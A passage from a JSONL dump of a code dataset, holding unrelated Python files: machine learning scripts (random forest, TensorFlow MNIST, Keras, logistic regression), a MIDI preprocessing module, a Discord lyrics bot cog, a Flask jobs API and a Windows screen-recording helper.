plt.title(\"PSI Performance\", fontsize=14)\r\n plt.ylabel('Median Values',fontsize=12)\r\n plt.xlabel('Bands',fontsize=12)\r\n self.table_psi.plot(kind='line',x='Bands',y='Expected',ax=ax,color='green')\r\n self.table_psi.plot(kind='line',x='Bands',y='Actual', ax=ax,color='red')\r\n plt.setp(ax.get_xticklabels(), rotation=30, horizontalalignment='right')\r\n book.remove(book['Sheet'])\r\n writer.save()\r\n writer.close()\r\n wb=openpyxl.load_workbook(path)\r\n ws=wb.create_sheet(\"PSI Graph\")\r\n plt.savefig(os.path.join(self.location,\"psi_graph\"+time.strftime(\"%d-%m-%Y %H-%M-%S\")+\".png\"),dpi=150)\r\n img=openpyxl.drawing.image.Image(os.path.join(self.location,\"psi_graph\"+time.strftime(\"%d-%m-%Y %H-%M-%S\")+\".png\"))\r\n ws.add_image(img)\r\n wb.save(path)\r\n wb.close() \r\n# wb=openpyxl.load_workbook(path)\r\n# export_graphviz(self.model, out_file='tree.dot',rounded = True,feature_names = self.train_data.columns, proportion = False,precision = 2, filled = True)\r\n# call(['dot', '-Tpng', 'tree.dot', '-o', 'tree.png', '-Gdpi=600'])\r\n# ws=wb.create_sheet(\"Train Tree\")\r\n# plt.figure(figsize = (14, 18))\r\n# plt.imshow(plt.imread('tree.png'))\r\n# plt.axis('off')\r\n# plt.savefig(os.path.join(self.location,\"Train_Tree\"+time.strftime(\"%d-%m-%Y %H-%M-%S\")+\".png\"),dpi=600)\r\n# img=openpyxl.drawing.image.Image(os.path.join(self.location,\"Train_Tree\"+time.strftime(\"%d-%m-%Y %H-%M-%S\")+\".png\"))\r\n# ws.add_image(img)\r\n# wb.save(path)\r\n# wb.close()\r\n joblib.dump(self.model,os.path.join(self.location,self.project_name+\"-\"+time.strftime(\"%d-%m-%Y %H-%M-%S\")+\".joblib.dat\"))\r\n del self.copy_train,self.copy_oos,self.copy_oot,self.copy_pdv,self.copy_psi\r\n return self.train_data,self.oos_data,self.oot_data,self.pdv_data,self.psi_data,self.table_train,self.table_oos,self.table_oot,self.table_pdv,self.table_psi\r\n\r\ndev_data=pd.read_csv('Regs_dev.csv')\r\noos_data=pd.read_csv('Regs_oot.csv')\r\noot_data=pd.read_csv('Regs_oot.csv')\r\npdv_data=pd.read_csv('Regs_pdv.csv')\r\npsi_data=pd.read_csv('Regs_psi.csv')\r\n \r\ncols_list=[' age', ' job ', ' marital ', ' education', ' default',\r\n ' housing', ' loan', ' contact', ' month', ' day_of_week', ' duration',\r\n ' campaign', ' pdays', ' previous', ' poutcome', ' emp_var_rate',\r\n ' cons_price_idx', ' cons_conf_idx', ' euribor3m', ' nr_employed']\r\nproject_name=\"Random_Forest_Regressor\"\r\nlocation=\"D:\\Project 5\\Random Forest Regressor\"\r\n\r\nmodel1=Random_Forest_Regressor(dev_data=dev_data,oos_data=oos_data,oot_data=oot_data,pdv_data=pdv_data,psi_data=psi_data,dependent=' duration',split_flag=False,hyperopt_flag=False,location=location,project_name=project_name,cols_list=cols_list)\r\ntrain_final,oos_final,oot_final,pdv_final,psi_final,dev_ks_table,ks_table_oos,ks_table_oot,ks_table_pdv,psi_table=model1.save_files()","sub_path":"Regression/Random_Forest_Regressor.py","file_name":"Random_Forest_Regressor.py","file_ext":"py","file_size_in_byte":24011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"526254877","text":"import tensorflow as tf\n\nfrom tensorflow.keras.layers import Dense, Flatten, Conv2D\nfrom tensorflow.keras import Model\n\n'''\nSubclassing API 提供了由运行定义的高级研究接口。为您的模型创建一个类,然后以命令方式编写前向传播。\n您可以轻松编写自定义层、激活函数和训练循环。\n'''\n\nmnist = tf.keras.datasets.mnist\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nx_train, x_test = x_train / 255.0, x_test / 255.0\n\nprint(x_train.shape)\n# 增加一个维度\nx_train = x_train[..., tf.newaxis] # 也可以np.expand_dims(X_train,axis = -1)\nx_test = x_test[..., tf.newaxis]\n\nprint(x_train.shape)\n\n# 使用tf.data将数据集打乱以及获取成批量数据\ntrain_ds = tf.data.Dataset.from_tensor_slices(\n (x_train, y_train)).shuffle(10000).batch(32)\n\ntest_ds = tf.data.Dataset.from_tensor_slices((x_test, y_test)).batch(32)\n\n\nclass MyModel(Model):\n def __init__(self):\n super().__init__()\n # 或者写成 super(MyModel,self).__init__() python2.7的写法\n self.conv1 = Conv2D(32, 3, activation='relu')\n self.flatten = Flatten()\n self.d1 = Dense(128, activation='relu') # 或者 units = 128, activation = tf.nn.relu\n self.d2 = Dense(10, activation='softmax')\n\n def call(self, x):\n x = self.conv1(x)\n x = self.flatten(x)\n x = self.d1(x)\n return self.d2(x)\n\n\n# 创建模型的实例\nmodel = MyModel()\n\n# 为训练选择优化器与损失函数:\nloss_object = tf.losses.SparseCategoricalCrossentropy()\n\noptimizer = tf.optimizers.Adam()\n\"\"\"\n tf.losses.SparseCategoricalCrossentropy与tf.losses.sparse_categorical_crossentropy的区别:\n tf.losses.sparse_categorical_crossentropy(y_true=y,y_pred=y_pred)是得到一个batch内每一个样本的loss\n 如batch_size=50时,得到的结果是shape=(50,)的Tensor\n 而tf.losses.SparseCategoricalCrossentropy()(y_true=y,y_pred=y_pred)得到的是reduce_mean之后的结果 \n 此时,结果shape=(),为一个标量,是50个loss值求平均的结果\n\"\"\"\n\n# 选择衡量指标来度量模型的损失值(loss)和准确率(accuracy)。这些指标在epoch上累积值,然后打印出整体结果。\ntrain_loss = tf.metrics.Mean(name='train_loss')\ntrain_accuracy = tf.metrics.SparseCategoricalAccuracy(name='train_accuracy')\n\ntest_loss = tf.metrics.Mean(name='test_loss')\ntest_accuracy = tf.metrics.SparseCategoricalAccuracy(name='test_accuracy')\n\n\n# 使用tf.GradientTape训练模型\n@tf.function\ndef train_step(images, labels):\n with tf.GradientTape() as tape:\n predictions = model(images)\n loss = loss_object(y_true=labels, y_pred=predictions)\n gradients = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n\n train_loss(loss)\n train_accuracy(labels, predictions)\n\n\n# 测试模型\n@tf.function\ndef test_step(images, labels):\n predictions = model(images)\n t_loss = loss_object(y_true=labels, y_pred=predictions)\n test_loss(t_loss)\n test_accuracy(labels, predictions)\n\n\nEPOCHS = 5\n\nfor epoch in range(EPOCHS):\n train_loss.reset_states()\n train_accuracy.reset_states()\n test_loss.reset_states()\n test_accuracy.reset_states()\n\n for images, labels in train_ds:\n train_step(images, labels)\n\n for test_images, test_labels in test_ds:\n test_step(test_images, test_labels)\n\n template = 'Epoch {}, Loss: {:.2f}, Accuracy: {:.2f}%, Test Loss: {:.2f}, Test Accuracy: {:.2f}%'\n print(template.format(\n epoch + 1,\n train_loss.result(),\n train_accuracy.result() * 100,\n test_loss.result(),\n test_accuracy.result() * 100\n ))\n # 此模型在测试集上的准确率达到了98.53%\n","sub_path":"Official/Overview/expert.py","file_name":"expert.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"391216231","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/hammr/utils/scan_utils.py\n# Compiled at: 2016-12-15 07:34:25\nfrom texttable import Texttable\nfrom ussclicore.utils import generics_utils\n\ndef scan_status(scan):\n if scan.status.complete and not scan.status.error and not scan.status.cancelled:\n return 'Done'\n else:\n if not scan.status.complete and not scan.status.error and not scan.status.cancelled:\n return str(scan.status.percentage) + '%'\n return 'Error'\n\n\ndef scan_table(scanInstances, scan=None):\n table = Texttable(800)\n table.set_cols_dtype(['t', 't', 't', 't'])\n table.header(['Id', 'Name', 'Status', 'Distribution'])\n if scan:\n table.add_row([scan.dbId, '\\t' + scan.name, scan_status(scan), ''])\n return table\n for myScannedInstance in scanInstances:\n table.add_row([myScannedInstance.dbId, myScannedInstance.name, '', myScannedInstance.distribution.name + ' ' + myScannedInstance.distribution.version + ' ' + myScannedInstance.distribution.arch])\n scans = generics_utils.order_list_object_by(myScannedInstance.scans.scan, 'name')\n for lscan in scans:\n table.add_row([lscan.dbId, '\\t' + lscan.name, scan_status(lscan), ''])\n\n return table","sub_path":"pycfiles/hammr_3.6-1.1-py2.7/scan_utils.py","file_name":"scan_utils.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"295248022","text":"import numpy as np\nimport keras\nfrom sklearn import preprocessing\n\n#Clustering\n#Zoning - x > 2250\n#Directional data\n\n\nx = []\ny = []\nw = []\nh = []\n\nwith open(\"locations.txt\", \"r\") as f:\n\tfor line in f.readlines():\n\t\targs = line.split()\n\t\ty.append(args[0])\n\t\tx.append(args[1])\n\t\th.append(args[2])\n\t\tw.append(args[3])\n\n\n\nx = [float(i) for i in x]\nx = np.divide(x, 3840)\nx = [[int(index == int(i * 10)) for index in range(10)] for i in x]\ny = [float(i) for i in y]\ny = np.divide(y, 2160)\ny = [[int(index == int(i * 10)) for index in range(10)] for i in y]\nw = [float(i) for i in w]\nw = [[int(index == int(i * 10)) for index in range(10)] for i in w]\nh = [float(i) for i in h]\nh = [[int(index == int(i * 10)) for index in range(10)] for i in h]\n\n#print(x)\nlefti = []\nrighti = []\nlefth = []\nleftw = []\nrighth = []\nrightw = []\n\nfor i in range(len(x)):\n\tif x[i].index(1) < 5:\n\t\tlefti.append(x[i] + y[i])\n\t\tlefth.append(h[i])\n\t\tleftw.append(w[i])\n\telse:\n\t\trighti.append(x[i] + y[i])\n\t\trighth.append(h[i])\n\t\trightw.append(w[i])\nlefti = np.array(lefti)\nrighti = np.array(righti)\n#inputs = [x[i] + y[i] for i in range(len(x))]#[list(i) for i in zip(x, y)]\n#outputs = [w[i] + h[i] for i in range(len(x))]#[list(i) for i in zip(w, h)]\n#train_inputs = np.array(inputs[:])\n# train_outputs = np.array(outputs[:190])\n# print(train_outputs)\n# test_inputs = np.array(inputs[190:])\n# test_outputs = np.array(outputs[190:])\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Dense(units=10, activation='relu', input_dim = 20))\nmodel.add(keras.layers.Dense(units=10, activation='softmax'))\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\nmodel.fit(lefti, np.array(leftw), epochs=15, batch_size=1)\nmodel.save(\"lxlocator.h5\")\n\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Dense(units=10, activation='relu', input_dim = 20))\nmodel.add(keras.layers.Dense(units=10, activation='softmax'))\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\nmodel.fit(lefti, np.array(lefth), epochs=15, batch_size=1)\nmodel.save(\"lylocator.h5\")\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Dense(units=10, activation='relu', input_dim = 20))\nmodel.add(keras.layers.Dense(units=10, activation='softmax'))\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\nmodel.fit(righti, np.array(rightw), epochs=15, batch_size=2)\nmodel.save(\"rxlocator.h5\")\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Dense(units=10, activation='relu', input_dim = 20))\nmodel.add(keras.layers.Dense(units=10, activation='softmax'))\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\nmodel.fit(righti, np.array(righth), epochs=15, batch_size=2)\nmodel.save(\"rylocator.h5\")\n\n\n\n\n\n\n\n\n\n\n# print(model.evaluate(test_inputs, test_outputs))\n\n\n# print(model.predict(np.array([inputs[5]])))\n# print(outputs[5])\n\n\n\n","sub_path":"yolov3/basic_modeler.py","file_name":"basic_modeler.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"373162504","text":"import time\nimport os\nimport re\nfrom win32com.client import Dispatch\nimport configparser\nimport ctypes\nfrom xlat import Log\nfrom xlat import Config\n\n\ndef is_admin():\n try:\n return ctypes.windll.shell32.IsUserAnAdmin()\n except:\n return False\n\n\ndef start_record():\n Log.info(\"准备录屏\")\n if not hasattr(Config, \"record\") or Config.record is False:\n Log.info(\"配置未开启录屏,请先配置Config.record=True\")\n return\n if hasattr(Config, \"recording\") and Config.recording is True:\n Log.error(\"正在录屏,请先停止后再开启!!\")\n return\n if not hasattr(Config, \"record_config\"):\n Log.info(\"修改配置文件\")\n config_path = os.getenv(\"appdata\")+\"\\\\oCam\\\\Config.ini\"\n Log.info(\"配置文件路径:%s\"%config_path)\n cfg = configparser.ConfigParser()\n if os.path.exists(config_path):\n Log.info(\"配置文件存在\")\n cfg.read(config_path)\n cur = cfg.get(\"TfrmOption\", \"lbledtOutputPath\")\n Log.info('当前的存储目录:%s'%cur)\n if cur != Config.result_dir:\n cfg.set(\"TfrmOption\", \"lbledtOutputPath\", Config.result_dir)\n Log.info('新设置的存储目录:%s' %cfg.get(\"TfrmOption\", \"lbledtOutputPath\"))\n f = open(config_path, \"w\")\n cfg.write(f)\n f.close()\n Log.info(\"关闭录制程序进程\")\n os.popen(\"TASKKILL /F /IM oCam.exe\")\n time.sleep(2)\n else:\n Log.info(\"配置文件不存在,复制过去\")\n cfg.read(Config.root+\"\\\\data\\\\ocam\\\\Config.ini\")\n cfg.set(\"TfrmOption\", \"lbledtOutputPath\", Config.result_dir)\n Log.info('新设置的存储目录:%s' % cfg.get(\"TfrmOption\", \"lbledtOutputPath\"))\n os.makedirs(os.getenv(\"appdata\")+\"\\\\oCam\")\n f = open(config_path, \"w\")\n cfg.write(f)\n f.close()\n Log.info(\"关闭录制程序进程\")\n os.popen(\"TASKKILL /F /IM oCam.exe\")\n time.sleep(2)\n Config.record_config = True\n\n autoit = Dispatch(\"AutoItX3.Control\")\n if \"oCam.exe\" not in os.popen('tasklist /FI \"IMAGENAME eq oCam.exe\"').read():\n if not is_admin():\n Log.error(\"录屏需要管理员权限,请以管理员权限重新执行!!!\")\n return\n autoit.Run(Config.root + \"\\\\data\\\\ocam\\\\oCam.exe\")\n time.sleep(5)\n Config.record_list = os.listdir(Config.result_dir)\n autoit.Send(\"{F2}\")\n Log.info(\"开始录屏...\")\n Config.recording = True\n\n\ndef stop_record():\n if not hasattr(Config, \"recording\") or Config.recording is False:\n Log.error(\"没有在录屏,不能停止!!\")\n return\n autoit = Dispatch(\"AutoItX3.Control\")\n autoit.Send(\"{F2}\")\n time.sleep(2)\n Log.info(\"结束录屏...\")\n Config.recording = False\n Config.record_list.sort()\n Log.info(Config.record_list)\n newfile = []\n i = 0\n while i < 5:\n new_list = os.listdir(Config.result_dir)\n new_list.sort()\n Log.info(new_list)\n for file in new_list:\n if file not in Config.record_list and re.match(\"录制_\\d{4}_\\d{2}_\\d{2}_\\d{2}_\\d{2}_\\d{2}_\\d{1,3}.mp4\",file):\n newfile.append(file)\n Log.info(newfile)\n if len(newfile) > 0:\n break\n i += 1\n time.sleep(1)\n if len(newfile) == 0:\n Log.error(\"没有新文件产生,录制失败\")\n return\n if len(newfile) >= 2:\n Log.error(\"录制生成两个以上的视频,只取第一个\")\n filepath = Config.result_dir+\"\\\\\"+newfile[0]\n Log.info(\"录制成功,文件保存在:\" + filepath + '播放 ')\n\n\nif __name__ == '__main__':\n Config.record = True\n start_record()\n time.sleep(5)\n stop_record()\n start_record()\n time.sleep(5)\n stop_record()\n","sub_path":"common/record.py","file_name":"record.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"487528723","text":"# For data preprocessing, we just used the codes provided by Daniel Johnson here: https://github.com/hexahedria/biaxial-rnn-music-composition/blob/master/data.py\n\nimport itertools\nimport os\nimport random\nimport sys\n\nfrom cache import Cache\nfrom midi_to_statematrix import *\n\n\ndef startSentinel():\n def noteSentinel(note):\n position = note\n part_position = [position]\n\n pitchclass = (note + lowerBound) % 12\n part_pitchclass = [int(i == pitchclass) for i in range(12)]\n\n return part_position + part_pitchclass + [0] * 66 + [1]\n\n return [noteSentinel(note) for note in range(upperBound - lowerBound)]\n\n\ndef getOrDefault(l, i, d):\n try:\n return l[i]\n except IndexError:\n return d\n\n\ndef buildContext(state):\n context = [0] * 12\n for note, notestate in enumerate(state):\n if notestate[0] == 1:\n pitchclass = (note + lowerBound) % 12\n context[pitchclass] += 1\n return context\n\n\ndef buildBeat(time):\n return [2 * x - 1 for x in [time % 2, (time // 2) % 2, (time // 4) % 2, (time // 8) % 2]]\n\n\ndef noteInputForm(note, state, context, beat):\n position = note\n part_position = [position]\n\n pitchclass = (note + lowerBound) % 12\n part_pitchclass = [int(i == pitchclass) for i in range(12)]\n part_prev_vicinity = list(\n itertools.chain.from_iterable((getOrDefault(state, note + i, [0, 0]) for i in range(-12, 13))))\n\n part_context = context[pitchclass:] + context[:pitchclass]\n\n return part_position + part_pitchclass + part_prev_vicinity + part_context + beat + [0]\n\n\ndef noteStateSingleToInputForm(state, time):\n beat = buildBeat(time)\n context = buildContext(state)\n return [noteInputForm(note, state, context, beat) for note in range(len(state))]\n\n\ndef noteStateMatrixToInputForm(statematrix):\n inputform = np.int8([noteStateSingleToInputForm(state, time) for time, state in enumerate(statematrix)])\n return inputform\n\ndef getpices(path='midis', midi_len=128, mode='all',composer=None):\n pieces = {}\n if not os.path.exists(path):\n # Download midi files\n import midi_scraper\n song_count = 0\n\n for composer_name in os.listdir(path):\n if composer is not None and composer_name not in composer: continue\n for fname in os.listdir(path+'/'+composer_name):\n if fname[-4:] not in ('.mid','.MID'):\n continue\n\n name = fname[:-4]\n\n outMatrix = midiToNoteStateMatrix(os.path.join(path, composer_name, fname))\n if len(outMatrix) < midi_len:\n continue\n\n pieces[name] = np.int8(outMatrix)\n song_count += 1\n print (\"Loaded {}-{}\".format(composer_name, fname))\n if mode != 'all':\n if song_count >= 10:\n print (\"{} songs are loaded\".format(song_count))\n return pieces\n print (\"{} songs are loaded\".format(song_count))\n return pieces\n\ndef getPieceSegmentFaulty(pieces, piece_length=128, measure_len=16, validation=False):\n # piece_length means the number of ticks in a training sample, measure_len means number of ticks in a measure\n val_size = len(pieces) // 5\n if validation:\n pieces_set = pieces[-val_size:]\n else:\n pieces_set = pieces[:-val_size]\n piece_name, full_length = random.choice(pieces)\n\n # We just need a segment of a piece as train data, and we want the start of a sample is the start of a measure\n start = random.randrange(0, full_length-piece_length,measure_len)\n\n seg_in, seg_out = cache.get(piece_name, start, start+piece_length)\n\n return seg_in, seg_out\n\ndef generate_batch(cache, batch_size, piece_length=128):\n while True:\n i,o = zip(*[getPieceSegment(cache, piece_length) for _ in range(batch_size)])\n yield(i,o)\n\ndef generate_val_batch(cache, batch_size, piece_length=128):\n while True:\n i,o = zip(*[getPieceSegment(cache, piece_length,validation=True) for _ in range(batch_size)])\n yield(i,o)\n\ndef getPieceSegment(cache, piece_length=128, measure_len=16, validation=False):\n # piece_length means the number of ticks in a training sample, measure_len means number of ticks in a measure\n val_size = max(cache.size // 10, 1)\n if validation:\n keys_and_lengths = cache.keys_and_lengths[-val_size:]\n else:\n keys_and_lengths = cache.keys_and_lengths[:-val_size]\n piece_name, full_length = random.choice(keys_and_lengths)\n\n # We just need a segment of a piece as train data, and we want the start of a sample is the start of a measure\n start = random.randrange(0, full_length-piece_length,measure_len)\n\n seg_in, seg_out = cache.get(piece_name, start, start+piece_length)\n\n return seg_in, seg_out\n\n\ndef initialize_cache(pieces, piece_length=128, measure_len=16, save_loc=\"cache.pkl\"):\n midi_cache = Cache()\n for piece_name in pieces:\n out_matrix = pieces[piece_name]\n print(out_matrix.shape)\n in_matrix = noteStateMatrixToInputForm(out_matrix)\n midi_cache.cache(in_matrix, out_matrix, piece_name)\n\n print(\"Cache initialized with {} pieces; total size is {} bytes\".format(len(pieces), midi_cache.byte_size))\n midi_cache.shuffle_piece()\n midi_cache.save(save_loc=save_loc)\n return midi_cache\n\n\ndef translate(note_matrix, direction=\"up\"):\n \"\"\"\n Translate the notes in a piece up or down one note to test invariance.\n Preprocess the note_matrix to get mute the highest and lowest note.\n \"\"\"\n translated_matrix = []\n\n # If we translate upwards, the highest note falls off\n # If we translate down, the lowest note falls off\n dropped_idx = 0\n if direction == \"up\":\n dropped_idx = -1\n\n for step_notes in note_matrix:\n # Each step_notes is a (78 x 2)\n if direction == \"up\":\n translated_matrix.append([[0, 0]] + [pair for pair in step_notes[0:-1]])\n else:\n translated_matrix.append([pair for pair in step_notes[1:]] + [[0, 0]])\n\n return translated_matrix\n\ndef translate_np(note_matrix, shift=1, direction=\"up\"):\n \"\"\"\n Translate the notes in a piece up or down one note to test invariance.\n Preprocess the note_matrix to get mute the highest and lowest note.\n \"\"\"\n if direction == \"down\":\n shift = shift * -1\n translated_matrix = np.roll(note_matrix, shift, axis=-2)\n return translated_matrix\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"146326653","text":"import flask\nfrom data import db_session\nfrom data.jobs import Jobs\nfrom flask import jsonify, request\nfrom datetime import datetime, timedelta\n\nblueprint = flask.Blueprint('jobs_api', __name__,\n template_folder='templates')\n\n\n@blueprint.route('/api/jobs')\ndef get_jobs():\n session = db_session.create_session()\n jobs = session.query(Jobs).all()\n return jsonify(\n {\n 'jobs':\n [item.to_dict()\n for item in jobs]\n }\n )\n\n\n@blueprint.route('/api/jobs/', methods=['GET'])\ndef get_one_news(jobs_id):\n session = db_session.create_session()\n jobs = session.query(Jobs).get(jobs_id)\n if not jobs:\n return jsonify({'error': 'Not found'})\n return jsonify(\n {\n 'jobs': jobs.to_dict(only=('team_leader', 'job', 'work_size', 'collaborators', 'is_finished', 'user.nam'))\n }\n )\n\n\n@blueprint.route('/api/jobs', methods=['POST'])\ndef create_jobs():\n if not request.json:\n return jsonify({'error': 'Empty request'})\n elif not all(key in request.json for key in\n ['job', 'team_leader', 'work_size', 'collaborators',\n 'is_finished']):\n print(request.json)\n return jsonify({'error': 'Bad request'})\n session = db_session.create_session()\n if session.query(Jobs).filter(Jobs.id == request.json['id']).first():\n return jsonify(({'error': 'Id already exists'}))\n jobs = Jobs(\n id=request.json['id'],\n job=request.json['job'],\n team_leader=request.json['team_leader'],\n work_size=request.json['work_size'],\n collaborators=request.json['collaborators'],\n start_date=datetime.now(),\n end_date=datetime.now() + timedelta(request.json['work_size']),\n is_finished=request.json['is_finished']\n )\n if session.query(Jobs).filter(Jobs.id == jobs.id).first():\n return jsonify({'error': 'Id already exists'})\n session.add(jobs)\n session.commit()\n return jsonify({'success': 'OK'})\n\n\n@blueprint.route('/api/jobs/', methods=['DELETE'])\ndef delete_jobs(jobs_id):\n session = db_session.create_session()\n jobs = session.query(Jobs).get(jobs_id)\n if not jobs:\n return jsonify({'error': 'Not found'})\n session.delete(jobs)\n session.commit()\n return jsonify({'success': 'OK'})\n\n\n@blueprint.route('/api/jobs/', methods=['PUT'])\ndef edit_jobs(id):\n if not request.json:\n return jsonify({'error': 'Empty request'})\n session = db_session.create_session()\n jobs = session.query(Jobs).filter(Jobs.id == id).first()\n if jobs:\n k = ['job', 'team_leader', 'work_size', 'collaborators',\n 'start_date', 'end_date', 'is_finished']\n for key in k:\n if key in request.json:\n if key == 'job':\n jobs.job = request.json[key]\n if key == 'team_leader':\n jobs.team_leader = request.json[key]\n if key == 'work_size':\n jobs.work_size = request.json[key]\n if key == 'collaborators':\n jobs.collaborators = request.json[key]\n if key == 'start_date':\n jobs.start_date = request.json[key]\n if key == 'end_date':\n jobs.end_date = request.json[key]\n if key == 'is_finished':\n jobs.is_finished = request.json[key]\n session.commit()\n return jsonify({'success': 'OK'})\n else:\n return jsonify({'error': 'Bad request'})\n\n","sub_path":"restapi/9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"66127770","text":"from asyncio import create_task\nfrom asyncio.exceptions import TimeoutError as Te\nfrom typing import Literal\n\nimport discord\nimport ksoftapi\nfrom redbot.core import commands\nfrom redbot.core.utils.chat_formatting import bold, humanize_list, pagify\nfrom redbot.core.utils.menus import DEFAULT_CONTROLS, menu\nfrom redbot.core.utils.predicates import MessagePredicate\n\nBASE_URL = \"https://api.ksoft.si/lyrics/search\"\n\n\nclass Lyrics(commands.Cog):\n\n __author__ = [\"Predeactor\"]\n __version__ = \"v1\"\n\n def __init__(self, bot, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.bot = bot\n self.client = None\n\n def format_help_for_context(self, ctx: commands.Context) -> str:\n \"\"\"Thanks Sinbad!\"\"\"\n pre_processed = super().format_help_for_context(ctx)\n return (\n \"{pre_processed}\\n\\nAuthor: {authors}\\nCog Version: {version}\\nThe cog is in beta \"\n \"and may be subect to unwanted behavior.\".format(\n pre_processed=pre_processed,\n authors=humanize_list(self.__author__),\n version=self.__version__,\n )\n )\n\n async def red_delete_data_for_user(\n self,\n *,\n requester: Literal[\"discord_deleted_user\", \"owner\", \"user\", \"user_strict\"],\n user_id: int,\n ):\n \"\"\"\n Nothing to delete...\n \"\"\"\n pass\n\n @commands.command(alias=[\"lyric\"])\n @commands.bot_has_permissions(embed_links=True)\n @commands.max_concurrency(1, commands.BucketType.user, wait=False)\n async def lyrics(self, ctx: commands.Context, *, song_name: str):\n \"\"\"Return the lyrics of a given music/song name.\n\n Powered by KSoft.Si.\n \"\"\"\n try:\n client = await self.obtain_client()\n except AttributeError:\n await ctx.send(\"Not key for KSoft.Si has been set, ask owner to add a key.\")\n return\n try:\n music_lyrics = await client.music.lyrics(song_name)\n except ksoftapi.NoResults:\n await ctx.send(\"No lyrics were found for your music.\")\n return\n message, available_musics = await self._title_choose(music_lyrics)\n await ctx.maybe_send_embed(message)\n predicator = MessagePredicate.less(10, ctx)\n try:\n user_message = await self.bot.wait_for(\"message\", check=predicator, timeout=60)\n except Te:\n await ctx.send(\"It's so silent on the outside...\")\n return\n\n choosen_music = user_message.content\n if choosen_music not in available_musics:\n await ctx.send(\n \"I was unable to find the corresponding music in the available music list.\"\n )\n return\n music = available_musics[choosen_music]\n embeds = []\n embed = discord.Embed(color=await ctx.embed_color(), title=music.name, description=None)\n embed.set_thumbnail(url=music.album_art)\n embed.set_footer(text=\"Powered by KSoft.Si.\", icon_url=ctx.author.avatar_url)\n for text in pagify(music.lyrics):\n embed.description = text\n embeds.append(embed)\n create_task(menu(ctx, embeds, DEFAULT_CONTROLS)) # No await since max_concurrency is here\n\n @staticmethod\n async def _title_choose(list_of_music: list):\n \"\"\"Function to return for requesting user's prompt, asking what music to choose.\n\n Parameter:\n - list_of_music: A list containing musics.\n\n Returns:\n A tuple with:\n - str: A list with musics name and their corresponding number.\n - dict: A list with the music according his number in the message.\n \"\"\"\n message = \"Please select the music you wish to get the lyrics by selecting the corresponding number:\\n\\n\"\n method = {}\n n = 0\n for music in list_of_music:\n if not isinstance(music, ksoftapi.models.LyricResult):\n continue # Not a music\n year = music.album_year[0]\n message += \"`{number}` - {title} by {author} {year}\\n\".format(\n number=n,\n title=music.name,\n author=music.artist,\n year=\"(\" + bold(year) + \")\" if year else \"\",\n )\n method[str(n)] = music\n n += 1\n return message, method\n\n async def obtain_client(self):\n \"\"\"Get a client and put it in self.client (For caching).\n\n Return:\n ksoftapi.Client: Client to use.\n \"\"\"\n if self.client:\n return self.client\n keys = await self.bot.get_shared_api_tokens(\"ksoftsi\")\n if keys.get(\"api_key\"):\n self.client = ksoftapi.Client(keys.get(\"api_key\"))\n return self.client\n return AttributeError(\"API key is not set.\")\n\n @staticmethod\n async def __session_closer(client):\n await client.close()\n\n def cog_unload(self):\n if self.client:\n create_task(self.__session_closer(self.client))\n","sub_path":"lyrics/lyrics.py","file_name":"lyrics.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"246313259","text":"#!/usr/bin/python\r\n\r\nimport sys\r\nfrom time import time\r\nimport logging\r\n\r\n# Display progress logs on stdout\r\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(message)s')\r\n\r\nsys.path.append(\"../DatasetProcessing\")\r\nfrom vectorize_split_dataset import preprocess\r\n\r\nfeatures_train, features_test, labels_train, labels_test = preprocess()\r\n\r\n#########################################################\r\n### your code goes here ###\r\n#peanlty='l2' - depends on datasize\r\n#dual=True when n_samples > n_features\r\n#C=1e5 Inverse of regularization strength, smaller values specify stronger regularization\r\n#fit_intercept=False Specifies if a constant should be added to the decision function\r\n#intercept_scaling=5 solver is liblinear. when self.fit_intercept is True, instance vector x becomes [x, self.intercept_scaling]\r\n#class_weight='balanced'\r\n#max_iter=100 Maximum number of iterations taken for the solvers to converge\r\n#random_state=42 The seed of the pseudo random number generator to use when shuffling the data\r\n#solver : {‘newton-cg’, ‘lbfgs’, ‘liblinear’, ‘sag’} Algorithm to use in the optimization problem\r\n#n_jobs=-1 Number of CPU cores used during the cross-validation loop. If given a value of -1, all cores are used\r\n#verbose=1 For the liblinear and lbfgs solvers set verbose to any positive number for verbosity\r\nweight = {'0':7, '1':3}\r\n#Optimum: penalty='l2',class_weight=weight\r\n\r\nfrom sklearn import linear_model\r\nclf = linear_model.LogisticRegression(penalty='l2', C=1e5, verbose=1 ,n_jobs=-1)\r\n#clf = linear_model.LogisticRegression(penalty='l1')\r\n#clf = linear_model.LogisticRegressionCV()\r\nt0 = 